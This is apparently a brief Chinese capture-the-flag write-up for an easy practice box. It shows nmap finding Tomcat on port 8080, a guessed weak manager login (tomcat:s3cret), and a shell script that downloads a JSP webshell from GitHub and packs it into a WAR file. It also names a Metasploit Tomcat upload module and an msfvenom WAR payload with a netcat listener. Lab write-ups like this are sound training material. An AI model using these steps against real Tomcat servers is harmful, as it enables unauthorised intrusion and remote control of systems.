easy box.
首先nmap开路:
找到8080端口:
Tomcat字典:
https://raw.githubusercontent...
找到弱口令tomcat:s3cret
部署war包:
方法1:
官方walkthrough上的:
#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war 部署wshell:
路径比较深
拿到flag
方法2:
msf使用multi/http/tomcat_mgr_upload
方法3:
msfvenom生成war包
上传war包后nc:
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。